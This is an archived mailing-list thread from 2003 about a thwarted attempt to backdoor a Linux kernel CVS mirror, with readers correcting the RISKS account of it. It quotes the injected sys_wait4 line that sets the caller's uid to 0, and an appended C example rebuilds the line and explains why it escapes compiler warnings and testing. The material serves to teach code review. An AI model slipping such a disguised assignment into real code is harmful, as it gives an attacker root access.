Politech mailing list archives

Responses to attempt to put backdoor in Linux kernel


From: Declan McCullagh <declan () well com>
Date: Thu, 13 Nov 2003 00:36:55 -0500

---

Date: Wed, 12 Nov 2003 17:45:22 -0500
To: Declan McCullagh <declan () well com>
From: "Robert E. Jones, III" <rjones () robjob com>
Subject: Re: [Politech] How a backdoor in the Linux kernel was thwarted, from RISKS
In-Reply-To: <6.0.0.22.2.20031112153041.021dbdb0 () mail well com>

Declan - Long-time Politech member, but only the second time I have written about an article.

Not to nit-pick on an otherwise fine email, but the poster is somewhat wrong, in that at least News.com picked up on the story (http://news.com.com/2100-7355-5103670.html). I consider News.com to be fairly "mainstream", even if not one of the larger news organizations.

Of course, Slashdot picked up on it and frankly, if you go just on sheer number of hits, Slashdot is about as mainstream as it gets. http://slashdot.org/articles/03/11/06/058249.shtml?tid=106&tid=185

Thanks

Rob Jones

---

To: Declan McCullagh <declan () well com>
Subject: Re: [Politech] How a backdoor in the Linux kernel was thwarted, from RISKS
In-Reply-To: <6.0.0.22.2.20031112153041.021dbdb0 () mail well com> (Declan McCullagh's message of "Wed, 12 Nov 2003 15:31:04 -0500")
From: Russ Allbery <rra () stanford edu>
Organization: The Eyrie
Date: Wed, 12 Nov 2003 15:11:49 -0800

Declan McCullagh <declan () well com> writes:

> Date: Tue, 11 Nov 2003 09:21:16 -0600
> From: "Douglas W. Jones" <jones () cs uiowa edu>
> Subject: Thwarted Linux backdoor

> On 5 Nov 2003, an attempt to insert a very cleverly crafted backdoor
> into Linux was averted.  This is a really good example of the subtle
> kinds of hacks a source code examiner must be waiting to catch if we
> want genuinely secure voting systems under the current model of
> proprietary DRE systems with a closed-door source code examination.

> Someone broke into a server at kernel.kbits.net and inserted the
> following code into the Linux kernel:

>          if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
>                          retval = -EINVAL;

> This was done in the code sys_wait4().  Larry McVoy caught the fact that
> the change had been made, and was annoyed because it wasn't logged
> properly.  Matthew Dharm asked "Out of curiosity, what were the changed
> lines."  Zwane Mwaikambo responded "That looks odd", and Andries Brouwer
> responded "Not if you hope to get root."

Wow, that's a bunch of nonsense.

The code in question was injected into a read-only export of the kernel as
a CVS tree, which is only there for the convenience of CVS users.  It is
used only for reference, not to do active kernel development, and no
releases are done from that tree.  In other words, there's really no
credible path whereby this code could have gotten into an actual release
of Linux.  The bug was never introduced into the actual working kernel
source as the above implies.

Larry McVoy was not annoyed that it wasn't logged properly; he was
investigating why there was code in the read-only CVS export which wasn't
actually in the main kernel repository.

The person writing up this problem for RISKS clearly didn't actually
understand it.

--
Russ Allbery (rra () stanford edu)             <http://www.eyrie.org/~eagle/>
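As an added example (mine, not code from the thread or from the kernel), the quoted line rebuilt in plain C with a constructed task struct and assumed flag values, so its two effects can be checked directly: the condition never rejects the call, and it silently leaves the caller's uid at 0.

```c
#include <errno.h>

/* Stand-ins for the kernel values named in the quoted line.  The macro names
 * are the kernel's; the numeric values and the task struct are assumptions
 * made for this example, not the kernel's own definitions. */
#ifndef __WCLONE
#define __WCLONE 0x80000000u
#endif
#ifndef __WALL
#define __WALL   0x40000000u
#endif

struct task { unsigned int uid; };   /* minimal stand-in for current->uid */

/* The injected line as quoted.  "current->uid = 0" is an assignment, not a
 * comparison: it evaluates to 0, so the && is always false and retval never
 * becomes -EINVAL, but the caller's uid has just been set to 0 (root).
 * Because the assignment is parenthesized, gcc's -Wparentheses check does
 * not fire, so the compiler does not flag the line either. */
int wait4_check_injected(struct task *current, unsigned int options)
{
    int retval = 0;
    if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
        retval = -EINVAL;
    return retval;
}

/* The same line with a real comparison: uid is read, never written. */
int wait4_check_comparison(struct task *current, unsigned int options)
{
    int retval = 0;
    if ((options == (__WCLONE|__WALL)) && (current->uid == 0))
        retval = -EINVAL;
    return retval;
}

/* Run one variant on a fresh task and report the uid it leaves behind. */
unsigned int uid_after(int injected, unsigned int start_uid, unsigned int options)
{
    struct task t = { start_uid };
    if (injected) wait4_check_injected(&t, options);
    else          wait4_check_comparison(&t, options);
    return t.uid;
}

/* Run one variant on a fresh task and report its return value. */
int retval_of(int injected, unsigned int start_uid, unsigned int options)
{
    struct task t = { start_uid };
    return injected ? wait4_check_injected(&t, options)
                    : wait4_check_comparison(&t, options);
}
```

The injected variant returns 0 for every input, so a test of the "error" path would never expose it; only reading the line (or diffing it against the main tree, as was done here) does.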

---

Date: Wed, 12 Nov 2003 18:01:41 -0300
From: Claudio Gutiérrez <gutierrezclaudio () terra cl>
To: Declan McCullagh <declan () well com>
Subject: Re: [Politech] How a backdoor in the Linux kernel was thwarted, from

This attack has only made the mainstream media in one place, so far:
    http://www.smh.com.au/articles/2003/11/07/1068013371170.html
    Bid to backdoor Linux kernel detected - smh.com.au
This is a pity, because I think this story is really important.

The attack was also reported on MSNBC, InfoWorld, The Register, Computerworld and SecurityFocus:

http://www.msnbc.com/news/990343.asp?cp1=1
http://www.infoworld.com/article/03/11/07/HNlinuxattack_1.html
http://www.theregister.co.uk/content/55/33855.html
http://www.computerworld.com/softwaretopics/os/linux/story/0,10801,86946,00.html
http://www.securityfocus.com/news/7388

_______________________________________________
Politech mailing list
Archived at http://www.politechbot.com/
Moderated by Declan McCullagh (http://www.mccullagh.org/)